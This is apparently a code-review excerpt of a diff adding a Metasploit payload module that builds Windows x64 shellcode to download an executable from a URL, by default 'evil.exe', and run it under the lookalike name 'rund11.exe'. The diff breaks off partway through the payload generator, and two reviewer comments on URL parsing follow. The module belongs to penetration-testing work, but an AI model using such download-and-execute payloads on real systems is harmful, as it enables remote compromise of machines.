modules/payloads/singles/windows/x64/download_exec.rb

```diff
@@ -0,0 +1,211 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+
+    CachedSize = 443
+  
+    include Msf::Payload::Windows
+    include Msf::Payload::Single
+    include Msf::Payload::Windows::BlockApi
+  
+    def initialize(info = {})
+      super(merge_info(info,
+        'Name'          => 'Windows x64 Executable Download (http,https,ftp) and Execute',
+        'Description'   => 'Download an EXE from an HTTP(S)/FTP URL and execute it',
+        'Author'        =>
+          [
+            'corelanc0d3r <peter.ve[at]corelan.be>', # Original x86
+            'itsmrmonday mrmonday[at]itsmrmonday.com (x64 adaptation)'
+          ],
+        'License'       => MSF_LICENSE,
+        'Platform'      => 'win',
+        'Arch'          => ARCH_X64
+      ))
+  
+      # Register command execution options
+      register_options(
+        [
+          OptString.new('URL', [true, "The pre-encoded URL to the executable", "https://localhost:443/evil.exe"]),
+          OptString.new('EXE', [true, "Filename to save & run executable on target system", "rund11.exe"])
+        ])
+    end
+  
+    #
+    # Construct the payload
+    #
+    def generate(_opts = {})
+  
+      target_uri = datastore['URL'] || ""
+      filename = datastore['EXE'] || ""
+      proto = "https"
+      dwflags_asm = "mov r9d, 0x08400000 ; dwFlags\n" 
+        # 0x80000000 | INTERNET_FLAG_RELOAD
+        # 0x04000000 | INTERNET_NO_CACHE_WRITE
+        # 0x00800000 | INTERNET_FLAG_SECURE
+        # 0x00200000 | INTERNET_FLAG_NO_AUTO_REDIRECT
+        # 0x00001000 | INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+        # 0x00002000 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+        # 0x00000200 ; INTERNET_FLAG_NO_UI
+  
+      exitfuncs = {
+        "THREAD"  => Rex::Text.block_api_hash("kernel32.dll", "ExitThread").to_i(16), # ExitThread
+        "PROCESS" => Rex::Text.block_api_hash("kernel32.dll", "ExitProcess").to_i(16), # ExitProcess
+        "SEH"     => 0x00000000,
+        "NONE"    => 0x00000000
+      }
+  
+      protoflags = {
+        "http"  => 0x3,
+        "https" => 0x3,
+        "ftp"   => 0x1
+      }
+  
+      exitfunc = datastore['EXITFUNC'].upcase
+  
+      if exitfuncs[exitfunc]
+        exitasm = case exitfunc
+          when "SEH" then "xor rax,rax\ncall rax"
+          when "NONE" then "jmp end"
+          else "xor r9d, r9d\nmov rcx, 0\nmov rdx, #{exitfuncs[exitfunc]}\ncall qword ptr [rbp-0x8]"
+        end
+      end
+  
+      # Parse URL to get:
+      # - Remote host
+      # - Port
+      # - /path/to/file
+      server_uri  = ''
+      server_host = ''
+      port_nr     = 443 # default
+  
+      if target_uri.length > 0
+  
+        if target_uri =~ /^http:/
+          proto = "http"
```

Comment:
If we don't not match http and match a typo or something as an example, should we be return an error here as well.

Reply:
Could we also just parse the URI to match sure it's valid rather than the regex checks?